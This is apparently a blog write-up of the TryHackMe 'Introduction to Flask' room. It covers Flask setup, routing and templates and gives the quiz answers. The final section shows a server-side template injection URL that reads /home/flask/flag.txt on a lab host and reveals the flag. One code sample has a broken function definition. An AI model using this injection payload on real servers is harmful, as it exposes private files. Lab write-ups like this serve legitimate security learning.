---
layout: post
title: "Introduction to Flask - Write-up - TryHackMe"
lang: en
categories:
  - writeups
tags:
  - security
  - writeups
  - web
  - thm
  - ssti
date: 2021/01/14 20:11:00
thumbnail: /images/TryHackMe/flask.jpeg
authorId: noraj
toc: true
---
# Information

## Room

- **Name:** Introduction to Flask
- **Profile:** [tryhackme.com](https://tryhackme.com/room/flask)
- **Difficulty:** Easy
- **Description**: How it works and how can I exploit it?

![Introduction to Flask](/images/TryHackMe/flask.jpeg)

# Write-up

## Installation and Deployment basics

> Which environment variable do you need to change in order to run Flask?

Answer: {% spoiler FLASK_APP %}

Clone the example repository:

```
$ git clone https://github.com/Swafox/Flask-examples
```

Create a virtual environment:

```
$ cd Flask-examples
$ python -m venv venv
$ source venv/bin/activate
```

Install flask:

```
$ pip3 install Flask
```

Choose the app to run and run it:

```
$ export FLASK_APP=helloworld.py
$ flask run
```

## Basic syntax and routing

> What's the default deployment port used by Flask?

Answer: {% spoiler 5000 %}

Check in your terminal.

> Is it possible to change that port? (yay/nay)

Answer: {% spoiler yay %}

```
$ flask run --help | grep port
  -p, --port INTEGER              The port to bind to.
```

## HTTP Methods and Template Rendering

> Does Flask support POST requests? (yay/nay)

Answer: {% spoiler yay %}

`httpmethods.py`

```python
from flask import request

def do_the do_the_login():
	return 'This was a POST request'

def show_the_login_form():
	return 'Not POST. Are you GETting me? :)'

@app.route('/login', methods=['GET', 'POST'])
def login():
    if request.method == 'POST':
        return do_the_login()
    else:
        return show_the_login_form()
```

> What markup language can you use to make templates for Flask?

Answer: {% spoiler html %}

`templaterendering.py`

```python
from flask import render_template

@app.route('/rendered')
def hello(name=None):
    return render_template('template.html', name=name)


'''
HTML example:
<!doctype html>
<title>Hello from Flask</title>
<h1>Hello again, TryHackMe</h1>
'''
```

## Flask Injection

> What's inside /home/flask/flag.txt ?

Answer: {% spoiler `THM{flask_1njected}` %}

Use a LFI in the SSTI: {% raw %} http://10.10.17.26:5000/vuln?name={{%20get_user_file(%22/home/flask/flag.txt%22)%20}} {% endraw %}
